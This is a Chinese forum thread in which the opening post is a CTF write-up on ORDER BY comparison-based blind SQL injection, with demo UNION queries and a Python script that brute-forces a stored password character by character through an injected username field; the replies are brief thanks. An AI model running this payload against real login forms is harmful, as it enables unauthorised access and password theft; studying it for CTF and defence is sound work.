挫莉虻 发表于 2025-7-20 16:30:21

SQL order by 大小比较盲注

SQL order by 大小比较盲注

在做ctfshow web入门 的 web691时遇到了SQL order by 大小比较盲注问题。因为是第一次遇到,记录一下

在做题之前,我们先来探讨一下order by 比较大小盲注
在本地先自己搭建一个数据库

我们输入查询语句
SELECT * FROM `login` WHERE name=1 or 1 union SELECT 1,1,1 order by 3;
更换一下查询语句
SELECT * FROM `login` WHERE name=1 or 1 union SELECT 1,1,2 order by 3;
这里很明显就能看出,当用联合查询出来的passwd值1时,最终回显的是name=1而当我们输入passwd值为2时,最终回显的是name=admin即为第一条数据,并且在实际中我们不知道passwd的值,会回显一个密码错误,这样我们就可以根据回显一位一位来爆破password的值
s = '0123456789:abcdefghijklmnopqrstuvwxyz{'
password=''
for i in range(50):
    for j in s:
      payload=password+j
      data={
            'username':"'or 1 union select 1,1,'"+payload+"' order by 3#",
            'passwd':''
            }
      r=requests.post(url,data=data)
      if "wrong pass!" in r.text:
            password+=chr(ord(j)-1)
            print(password)
            break回归到原题

岭猿 发表于 2025-10-20 18:04:17

新版吗?好像是停更了吧。

晾棋砷 发表于 2025-10-25 02:23:17

懂技术并乐意极积无私分享的人越来越少。珍惜

橘芜 发表于 2025-10-25 13:47:30

过来提前占个楼

辅箱肇 发表于 2025-11-13 02:52:02

分享、互助 让互联网精神温暖你我

焦和玉 发表于 2025-11-25 00:57:47

收藏一下   不知道什么时候能用到

阮蓄 发表于 2025-12-12 04:00:04

yyds。多谢分享

挚魉 发表于 2025-12-14 04:44:40

懂技术并乐意极积无私分享的人越来越少。珍惜

辅箱肇 发表于 2026-1-8 07:30:56

喜欢鼓捣这些软件,现在用得少,谢谢分享!

廖彗云 发表于 2026-1-11 14:36:01

谢谢楼主提供!

仇华乐 发表于 2026-1-11 19:02:01

yyds。多谢分享

村亢 发表于 2026-1-15 06:56:35

东西不错很实用谢谢分享

哈妙思 发表于 2026-1-18 08:33:16

收藏一下   不知道什么时候能用到

秦欣艷 发表于 2026-1-20 10:48:15

懂技术并乐意极积无私分享的人越来越少。珍惜

纣捎牟 发表于 2026-1-22 05:30:42

谢谢分享,试用一下

篙菠 发表于 2026-1-23 06:49:24

yyds。多谢分享

柄利 发表于 2026-1-23 15:07:20

过来提前占个楼

呵桢 发表于 2026-1-24 10:30:26

感谢发布原创作品,程序园因你更精彩

骆贵 发表于 2026-1-24 11:41:09

感谢分享,下载保存了,貌似很强大

泡市 发表于 2026-1-25 12:34:25

这个好,看起来很实用
页: [1] 2
查看完整版本: SQL order by 大小比较盲注